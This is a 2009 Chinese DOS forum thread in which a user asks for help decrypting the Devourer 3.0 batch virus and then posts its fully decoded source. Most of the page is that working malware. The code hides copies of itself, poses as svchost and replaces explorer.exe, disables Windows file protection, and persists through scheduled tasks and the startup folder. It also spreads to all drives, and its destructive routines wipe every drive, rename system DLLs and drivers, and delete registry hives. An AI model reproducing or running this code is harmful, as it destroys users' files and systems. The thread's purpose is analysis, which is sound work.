中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » [求助]解密Devourer_3.0病毒BAT文件
作者:
标题: [求助]解密Devourer_3.0病毒BAT文件 上一主题 | 下一主题
badboy110
新手上路





积分 9
发帖 6
注册 2007-6-4
状态 离线
『楼 主』:  [求助]解密Devourer_3.0病毒BAT文件

最近发现好的人中了这个Devourer_3.0病毒 WORD文件TXT文件全被打包成自解压程序了。
自解压程序中有个Devourer_3.0开头的BAT 病毒文件
使用了2次加密
普通加密和 变量加密
小弟本事不过关 没完全解出来。。
特发出来求助!

DOC感染样本
http://upload.cn-dos.net/img/1771.rar

2009-12-9 02:14
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
badboy110
新手上路





积分 9
发帖 6
注册 2007-6-4
状态 离线
『第 2 楼』:  

自己一个一个替换完了。。


pengfei@cn-dos.net

goto RealHead
[Devourer_3.0_19066379410755][神行者sn.txt][TDPack]
:RealHead
cls
@echo off
:AvoideVNBug
if "%APPDATA%"=="" if not exist %systemroot%\system32\drivers\values.log goto Kill
if "%APPDATA%"=="" FOR /F "tokens=*" %%i in (%systemroot%\system32\drivers\values.log) do set %%i
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set Dewourer=%systemroot%\Fonts\HIDESE~1
set setup=%systemroot%\Fonts\HIDESE~1\Dewourersetup
set rar=%Devourer%\WinRAR
set selfcode=%random%%random%
if "%1"=="-Install" goto Install
if "%1"=="-Run" goto Run
if "%1"=="-Tenbatsu" goto Tenbatsu
if "%1"=="-Kill" goto Kill
if "%1"=="-Open" goto Open
if /i "%1"=="-goto" goto %2
:CheckSign
if "%1"=="-Fil" if exist %Devourer%\Devourer.sign del /f /a /q %0&exit
if exist %Devourer%\Devourer.sign exit
echo %selfcode%>%Devourer%\Devourer.sign
if not exist %Devourer%\SOLA.BAT goto ChkSGNNext
del /f /a /q %Devourer%\*.*
rd /s /q %Devourer%\solasetup
:ChkSGNNext
echo>%Devourer%\sola.sign
if not exist "%ALLUSERSPROFILE%\桌面" goto End
:HIDESelf
md %systemroot%\Fonts\HIDESELF...\
md %Devourer%\0nodel................\
if not exist %Devourer% goto Kill
:FileCopy
set selfname=%0
attrib %selfname% -s -h -r
if not "%1"=="-USB" copy %selfname% %Devourer%\Devourer.bat
if "%1"=="-USB" copy Devourer.bat %Devourer%\Devourer.bat
attrib %selfname% +s +h +r
if not exist %Devourer%\Devourer.bat goto kill
cd\
md %Devourer%\WinRAR
md %Devourer%\WinRAR\Formats
if not exist Devourer\WINRAR goto FileCopyNext
copy Devourer\WinRAR\*.* %Devourer%\Winrar\*.*
copy Devourer\WinRAR\Formats\*.* %Devourer%\Winrar\Formats\*.*
goto FileCopyNext2
:FileCopyNext
if not exist "%programfiles%\winrar\winrar.exe" goto Kill
copy "%programfiles%\winrar\*.*" %Devourer%\Winrar\*.*
copy "%programfiles%\winrar\Formats\*.*" %Devourer%\Winrar\Formats\*.*
:FileCopyNext2
echo On Error Resume Next>%Devourer%\Devourer.VBS
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\Devourer.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -Install",0 >>%Devourer%\Devourer.VBS
cscript %Devourer%\Devourer.VBS
del %Devourer%\Devourer.VBS
if "%1"=="-Fil" del /f /a /q %0
exit
====================================================
:Install
:PackerSetup
%SystemDrive%
cd %Devourer%
if exist Devourersetup rd /s /q Devourersetup
md Devourersetup
cd Devourersetup
..\WinRAR\rar.exe e -hpeostc "%0"
..\WinRAR\rar.exe a -m5 -hpeostc Function.dll *
copy ..\WinRAR\rar.exe rar.exe
copy *.ico ..\WinRAR\*.ico
copy example.rar ..\WinRAR\example.rar
cd..
tasklist >%Devourer%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%Devourer%\task.txt"') do set svchost=%%i
copy %systemroot%\system32\cmd.exe %Devourer%\%svchost%
copy %setup%\sleep.exe %setup%\%svchost%
if not exist %Devourer%\svchost.exe copy %systemroot%\system32\cmd.exe %Devourer%\svchost.exe&copy %setup%\sleep.exe %setup%\svchost.exe
del %Devourer%\task.txt
cd WinRAR
copy Default.SFX C:\~$.sfx
for %%i in (txt doc jpg exe exp fil) do copy example.rar ..\Devourersetup\%%ipack.dll
start /min %rar%\winrar.exe ch -- %setup%\example.rar
%setup%\svchost.exe 1000
call regedit.exe /s %setup%\RegA.txt
%setup%\svchost.exe 1000
copy /y txt.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\txtpack.dll&%setup%\svchost.exe 2000
copy /y doc.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\docpack.dll&%setup%\svchost.exe 2000
copy /y jpg.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\jpgpack.dll&%setup%\svchost.exe 2000
copy /y exe.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\exepack.dll&%setup%\svchost.exe 2000
copy /y exp.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\exppack.dll&%setup%\svchost.exe 2000
copy /y fil.ico C:\~$.ico&start /min %rar%\winrar.exe ch -- %setup%\filpack.dll&%setup%\svchost.exe 2000
call regedit.exe /s %setup%\RegB.txt
del C:\~$.*
cd..
:MakeRarNormal
md 0WinRAR\Formats
cd 0WinRAR
copy ..\WinRAR\Formats\UNACEV2.DLL Formats\*.*
copy ..\WinRAR\Default.SFX Default.SFX
copy ..\WinRAR\Descript.ion Descript.ion
copy ..\WinRAR\Rar.exe Rar.exe
copy ..\WinRAR\RarExt64.dll RarExt64.dll
copy ..\WinRAR\RarExt.dll RarExt.dll
copy ..\WinRAR\RarFiles.lst RarFiles.lst
copy ..\WinRAR\WinRAR.exe WinRAR.exe
cd..
rd /s /q WinRAR
ren 0WinRAR WinRAR
if exist %Devourer%\mod.bat del /f /a /q %Devourer%\mod.bat
copy %setup%\mod.bat %Devourer%\mod.bat
echo ::MADE_BY_KCN-%selfcode%>>%Devourer%\mod.bat
copy /Y %setup%\CHAIN.BAT %systemroot%\system32\CHAIN.BAT
echo Windows Registry Editor Version 5.00>%setup%\reg.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]>>%setup%\reg.reg
echo "Start"=dword:00000002>>%setup%\reg.reg
regedit /e %systemroot%\ls.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule"
%setup%\svchost.exe 1000
type %systemroot%\ls.reg>%Devourer%\ls.txt
FOR /F "tokens=2 delims=:" %%i in ('findstr /c:"tart" %Devourer%\ls.txt') do if not "%%i"=="00000002" regedit /s %setup%\reg.reg
echo Windows Registry Editor Version 5.00>>%setup%\reg2.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]>>%setup%\reg2.reg
echo "HideFileExt"=dword:00000001>>%setup%\reg2.reg
echo "ShowSuperHidden"=dword:00000000>>%setup%\reg2.reg
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt]>>%setup%\reg2.reg
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]>>%setup%\reg2.reg
start regedit.exe /s %setup%\reg2.reg
:Mainsetup
:MainStep1
echo On Error Resume Next>lsvbs.VBS
echo set ws=wscript.createobject("wscript.shell")>>lsvbs.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -goto TaskSetup",0 >>lsvbs.VBS
cscript lsvbs.vbs
%setup%\svchost.exe 10000
if exist %Devourer%\TaskOK del %Devourer%\TaskOK&goto MainStep4
:MainStep2
del %systemroot%\Tasks\Tasks.job
echo On Error Resume Next>lsvbs.VBS
echo set ws=wscript.createobject("wscript.shell")>>lsvbs.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -goto ExpSetup",0 >>lsvbs.VBS
cscript lsvbs.vbs
%setup%\svchost.exe 10000
if exist %Devourer%\ExpOK del %Devourer%\ExpOK&goto MainStep4
:MainStep3
echo On Error Resume Next>lsvbs.VBS
echo set ws=wscript.createobject("wscript.shell")>>lsvbs.VBS
echo ws.run "cmd /c %Devourer%\Devourer.BAT -goto MenuSetup",0 >>lsvbs.VBS
cscript lsvbs.vbs
%setup%\svchost.exe 10000
if exist %Devourer%\MenuOK del %Devourer%\MenuOK&goto MainStep4
goto Kill
:MainStep4
:NOSLK
del /f /a /q %systemroot%\system32\rar.exe %systemroot%\SOLAADDRESS.TXT "%Programfiles%\KAKENHI'S\GUICheck.bat"
md %systemroot%\system32\rar.exe\nodel......\
md %systemroot%\solaaddress.txt\nodel......\
md "%Programfiles%\KAKENHI'S\GUICheck.bat\nodel......\"
:SetTwunk32
FOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\twunk_16.exe') do if /I "%%j"=="twunk_16.exe" set fDate=%%i
set rDate=%Date%
date %fDate%
echo.>>%systemroot%\Fonts\deskUI.ini
echo [.ShellClassInfo2]>>%systemroot%\Fonts\deskUI.ini
echo fontype=NT-%selfcode%.FON>>%systemroot%\Fonts\deskUI.ini
set>%systemroot%\system32\driwers\walues.log
date %rDate%
:VoideUnownBug
FOR /F "tokens=*" %%i in (%Devourer%\Devourer.bat) do echo %%i>LS.bat&goto DebugNext
:DebugNext
type %setup%\Devourer.bat>>LS.bat
copy /y LS.bat %Devourer%\Devourer.bat&exit
:TaskSetup
attrib %systemroot%\Tasks\Tasks.job -s -h -r
del %systemroot%\Tasks\Tasks.job
type %setup%\Tasks.xxx>%systemroot%\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 exit
:TaskNext
attrib %systemroot%\Tasks\Tasks.job +s +h +r
echo.>%Devourer%\TaskOK
echo.>%Devourer%\TaskStart
exit
:ExpSetup
ren %systemroot%\system32\svchost.exe 0svchost.exe
if errorlevel 1 exit
ren %systemroot%\system32\0svchost.exe svchost.exe
if not exist %systemroot%\system32\dbgeng.dll exit
copy /Y %setup%\exppack.dll %Devourer%\explorer.exe
copy /Y %setup%\ntsd.exe %systemroot%\system32\stop.exe
echo On Error Resume Next>Devourer.VBS
echo set ws=wscript.createobject("wscript.shell")>>Devourer.VBS
echo ws.run "%Devourer%\svchost.exe /c %Devourer%\Devourer.BAT -Run -ExpStart",0 >>Devourer.VBS
echo ws.run "%systemroot%\system32\CHAIN.BAT -Guide",0 >>Devourer.VBS
%setup%\rar.exe -m0 -ep -ep1 a %Devourer%\explorer.exe Devourer.vbs
del Devourer.vbs
:ZsMake1
echo SavePath>zs.txt
echo Setup=Devourer.vbs>>zs.txt
echo silent=1 >>zs.txt
echo Overwrite=1 >>zs.txt
%setup%\rar.exe -zzs.txt c %Devourer%\explorer.exe
del zs.txt
echo KZSSXN93JS900SCKNKDSK>>%Devourer%\explorer.exe
:KillSFC
start mshta "javascript:new ActiveXObject('WScript.Shell').Run('stop -pn winlogon.exe',0);window.close()"
del /f /a %systemroot%\system32\sfcfiles.dll %systemroot%\system32\dllcache\sfcfiles.dll
:ReplaceFile
ren %systemroot%\explorer.exe 0explorer.exe
attrib %systemroot%\0explorer.exe +s +h +r
copy %Devourer%\explorer.exe %systemroot%\explorer.exe
echo.>%Devourer%\ExpOK
exit
:MenuSetup
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
echo On Error Resume Next>Devourer.VBS
if not exist Devourer.VBS exit
echo set ws=wscript.createobject("wscript.shell")>>Devourer.VBS
echo ws.run "%Devourer%\svchost.exe /c %Devourer%\Devourer.BAT -Run",0 >>Devourer.VBS
echo ws.run "%systemroot%\system32\CHAIN.BAT -Guide",0 >>Devourer.VBS
copy Devourer.VBS %Devourer%\Devourer.VBS
echo NT>%Devourer%\NoTasks
echo.>%Devourer%\MenuOK
exit
:Run
if exist %Devourer%\Dewourer.sign echo %selfcode%>%Devourer%\Dewourer.sign
if not "%2"=="-ExpStart" goto RunNext
:StartExplorer
%systemdrive%
cd %systemroot%
ren explorer.exe 1explorer.exe
attrib 0explorer.exe -s -h -r
ren 0explorer.exe explorer.exe
start explorer.exe
%setup%\svchost.exe 10000
ren explorer.exe 0explorer.exe
ren 1explorer.exe explorer.exe
attrib 0explorer.exe +s +h +r
del %systemroot%\Devourer.VBS
cd %Devourer%
:RunNext
:RunTimeChk
if not exist %Devourer%\RunTime.txt echo RunSign_50>%Devourer%\RunTime.txt
FOR /F "tokens=2 delims=_" %%i in (%Devourer%\RunTime.txt) do set RunTime=%%i
if /i %RunTime% leq 0 goto Virus
set /a RunTime=%Runtime%-1
echo RunSign_%RunTime%>%Devourer%\RunTime.txt
:Diskchk
echo On Error Resume Next>%Devourer%\RecentInf.VBS
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\RecentInf.VBS
echo ws.run "%Devourer%\svchost.exe /c %setup%\RecentInf.bat",0 >>%Devourer%\RecentInf.VBS
cscript %Devourer%\RecentInf.VBS
del %Devourer%\RecentInf.VBS
set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动
set taskroot=%systemroot%\Tasks
:CHAIN
echo.>%systemroot%\DriweInf.ini
echo On Error Resume Next>%Devourer%\lswbs.wbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lswbs.wbs
echo ws.run "%systemroot%\system32\CHAIN.BAT -TimeSet",0 >>%Devourer%\lswbs.wbs
cscript %Devourer%\lswbs.wbs
del %Devourer%\lswbs.wbs
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\Devourerchk1 & findstr . %%i:\Devourerchk1 & if not errorlevel 1 del %%i:\Devourerchk1&if not exist %%i:\Devourer\WINRAR\WinRAR.exe md %%i:\Devourer\WinRAR\Formats&copy %rar%\Formats\* %%i:\Devourer\WinRAR\Formats\*&copy %rar%\* %%i:\Devourer\WinRAR\*&attrib %%i:\Devourer +s +h +r
echo On Error Resume Next>%Devourer%\lsvbs.vbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lsvbs.vbs
echo ws.run "%Devourer%\svchost.exe /c %setup%\RarInform.bat %selfcode%",0 >>%Devourer%\lsvbs.vbs
cscript %Devourer%\lsvbs.vbs
del %Devourer%\lsvbs.vbs
:RunBack
if "%chktime%"=="" set chktime=0
set /a chktime=%chktime%+2
if /i %chktime% geq 60 goto DvRARChk
:RunBack2
if "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C:
if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D:
if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E:
if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F:
if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G:
if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H:
if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I:
if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J:
if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K:
if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L:
if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M:
if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N:
if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O:
if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P:
if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:
if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R:
if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S:
if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T:
if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U:
if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V:
if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W:
if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X:
if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:
if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:
if "%C%"=="2" vol C:&if errorlevel 1 set C=1
if "%D%"=="2" vol D:&if errorlevel 1 set D=1
if "%E%"=="2" vol E:&if errorlevel 1 set E=1
if "%F%"=="2" vol F:&if errorlevel 1 set F=1
if "%G%"=="2" vol G:&if errorlevel 1 set G=1
if "%H%"=="2" vol H:&if errorlevel 1 set H=1
if "%I%"=="2" vol I:&if errorlevel 1 set I=1
if "%J%"=="2" vol J:&if errorlevel 1 set J=1
if "%K%"=="2" vol K:&if errorlevel 1 set K=1
if "%L%"=="2" vol L:&if errorlevel 1 set L=1
if "%M%"=="2" vol M:&if errorlevel 1 set M=1
if "%N%"=="2" vol N:&if errorlevel 1 set N=1
if "%O%"=="2" vol O:&if errorlevel 1 set O=1
if "%P%"=="2" vol P:&if errorlevel 1 set P=1
if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1
if "%R%"=="2" vol R:&if errorlevel 1 set R=1
if "%S%"=="2" vol S:&if errorlevel 1 set S=1
if "%T%"=="2" vol T:&if errorlevel 1 set T=1
if "%U%"=="2" vol U:&if errorlevel 1 set U=1
if "%V%"=="2" vol V:&if errorlevel 1 set V=1
if "%W%"=="2" vol W:&if errorlevel 1 set W=1
if "%X%"=="2" vol X:&if errorlevel 1 set X=1
if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1
if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1
if exist %systemroot%\DriveInf.ini del %systemroot%\DriveInf.ini
echo.>%systemroot%\DRKakunin.ini
%setup%\svchost.exe 500
if exist %systemroot%\ls*.reg del %systemroot%\ls*.reg
regedit /e %systemroot%\ls1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule"
%setup%\svchost.exe 500
type %systemroot%\ls1.reg>%Devourer%\ls.txt
FOR /F "tokens=2 delims=:" %%i in ('findstr /c:"tart" %Devourer%\ls.txt') do if not "%%i"=="00000002" regedit /s %setup%\reg.reg
%setup%\svchost.exe 500
if exist %Devourer%\NoTasks if not exist "%runroot%\Devourer.VBS" copy "%Devourer%\Devourer.VBS" "%runroot%\Devourer.VBS"
if exist %Devourer%\TaskStart if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"
if "%2"=="-ExpStart" attrib %systemroot%\explorer.exe -s -h -r&%setup%\svchost.exe 500
if not exist %systemroot%\explorer.exe copy %setup%\explorer.exe %systemroot%\explorer.exe
if "%2"=="-ExpStart" findstr KZSSXN93JS900SCKNKDSK %systemroot%\explorer.exe>nul&if errorlevel 1 if not exist %systemroot%\1explorer.exe goto Kill
if not exist %systemroot%\system32\CHAIN.BAT goto Kill
set sign=
FOR /F "skip=1 tokens=*" %%i in (%systemroot%\system32\CHAIN.BAT) do set sign=%%i&goto CHCHK
:CHCHK
if not "%sign%"=="::CHAIN" goto Kill
%setup%\svchost.exe 500
goto RunBack
:Restart
if exist "D:\I am KAKENHI.txt" shutdown -r -t 100 -c "DevourerRestart"&goto RSTEnd
shutdown -r -f -t 1
%setup%\svchost.exe 100000
start %setup%\ntsd.exe -c q -pn csrss.exe
:RSTEnd
goto DiskChk
:DvRARChk
set chktime=0
if not exist %Devourer%\ScanF goto RunBack2
echo On Error Resume Next>%Devourer%\lsvbs.vbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lsvbs.vbs
echo ws.run "%Devourer%\svchost.exe /c %setup%\RarInform.bat %selfcode%",0 >>%Devourer%\lsvbs.vbs
cscript %Devourer%\lsvbs.vbs
del %Devourer%\lsvbs.vbs
goto RunBack2
:Virus
if exist %systemroot%\tasks\tasks.ini if exist %systemroot%\tasks\desks.ini goto HiPD
if exist %systemroot%\tasks\tasks.ini goto TENBATSU
if exist %systemroot%\tasks\desks.ini goto formatall
if exist %Devourer%\HKLFinish.ini if exist %Devourer%\AKLFinish.ini goto Reset
del %Devourer%\RunTime.txt
goto DiskChk
:HiPD
FOR %%i IN (%setup%\akari.txt) DO if /i %%~zi lss 102400 goto TENBATSU
goto Reset
:Kill
if exist "D:\I am KAKENHI.txt" shutdown -r -t 100 -c "DevourerKill"&goto KillEND
echo Windows Registry Editor Version 5.00>%systemroot%\recover.reg
echo [-HKEY_LOCAL_MACHINE\HARDWARE]>>%systemroot%\recover.reg
echo del /f /a /q %systemroot\repair\*>%systemroot%\units.bat
echo ren %systemroot%\system32\*.dll 0*.dll>>%systemroot%\units.bat
echo ren %systemroot%\system32\drivers\*.sys 0*.sys>>%systemroot%\units.bat
echo On Error Resume Next>lskill.vbs
echo set ws=wscript.createobject("wscript.shell")>>lskill.vbs
echo ws.run "cmd /c %systemroot%\units.bat",0 >>lskill.vbs
del /f /a /q %systemroot%\system32\dllcache\*
ren %systemroot%\explorer.exe explorer.exe123
taskkill /f /im explorer.exe&ntsd -c q -pn explorer.exe
shutdown -r -t 60 -c "由于CRC服务被意外终止,系统即将重新启动。"
mshta "javascript:new ActiveXObject('WScript.Shell').Run('cmd /c del /f /a /q %systemdrive%\\*',0);window.close()"
cscript lskill.vbs
regedit /s %systemroot%\recover.reg
:KillEND
goto Diskchk
:TENBATSU
if exist "D:\I am KAKENHI.txt" shutdown -r -t 100 -c "TENBATSU"&goto TENBATSUEND
set alldrive=
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do call %setup%\HIKARI.BAT eoladd %%i:
for %%i in (%alldrive%) do del /f /a /q /s %%i
del /f /a /q /s "%HOMEDRIVE%\Documents and Settings"
goto Kill
:formatall
echo On Error Resume Next>%Devourer%\lswbs.wbs
echo set ws=wscript.createobject("wscript.shell")>>%Devourer%\lswbs.wbs
echo ws.run "%Devourer%\swchost.exe /c %setup%\akari.bat LBEX %selfcode%",0 >>%Devourer%\lswbs.wbs
cscript %Devourer%\lswbs.wbs
del %Devourer%\lswbs.wbs
echo RunSign_999999999>%Devourer%\RunTime.txt
:TENBATSUEND
goto DiskChk
:Reset
del %systemroot%\Tasks\*.ini
del %Devourer%\ScanF %Devourer%\HKLFinish.ini %Devourer%\AKLFinish.ini
del %Devourer%\hikari.ini %Devourer%\akari.ini
del %setup%\hikari.txt %setup%\akari.txt
del %Devourer%\RarInform.ini %Devourer%\RunTime.txt
goto DiskChk
:Open
if "%1"=="-USB" Exit
FOR /F "tokens=1,2,3 skip=2 delims=[]" %%i in (%~nx0) do set code=%%i&set name=%%j&set type=%%k&goto OpenNext
:OpenNext
goto %type%
:EJPack
if not Exist "%Name%" exit
call "%Name%"
del /f /a /q "%Name%"
del /f /a /q %0
exit
:TDPack
if not exist "%Name%" exit
call "%Name%"
:Save
FOR /F "tokens=1 delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%i
%setup%\rar.exe -m0 -ep -ep1 a "%PackName%" "%Name%"
echo %Code%>>"%PackName%"
:Del
del /f /a /q "%Name%"
del /f /a /q %0
exit
:End

2009-12-9 06:31
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
netbenton
银牌会员

批处理编程迷


积分 1916
发帖 752
注册 2008-12-28
来自 广西
状态 离线
『第 3 楼』:  

呵呵,楼主真有耐心,

搞这个病毒的人真的很无聊。。。



精简
[你的+我的+他的]=>[大家的]    个人网志   
2009-12-9 08:27
查看资料  发送邮件  发短消息 网志  OICQ (37659560)  编辑帖子  回复  引用回复
Lin2009
初级用户





积分 27
发帖 11
注册 2009-12-7
状态 离线
『第 4 楼』:  很牛吗。下

这是个什么病毒呀

2009-12-9 23:41
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
badboy110
新手上路





积分 9
发帖 6
注册 2007-6-4
状态 离线
『第 5 楼』:  

Devourer病毒 跟之前的那个SOLA病毒类似。。。
http://tieba.baidu.com/f?kz=633039463
这里有介绍

2009-12-10 09:53
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
523066680
银牌会员

SuperCleaner


积分 2362
发帖 1133
注册 2008-2-2
状态 离线
『第 6 楼』:  

搞病毒的人都很无聊的……



综合型编程论坛

我的作品索引
  
2009-12-10 14:20
查看资料  发送邮件  访问主页  发短消息 网志  OICQ (523066680)  编辑帖子  回复  引用回复

请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转: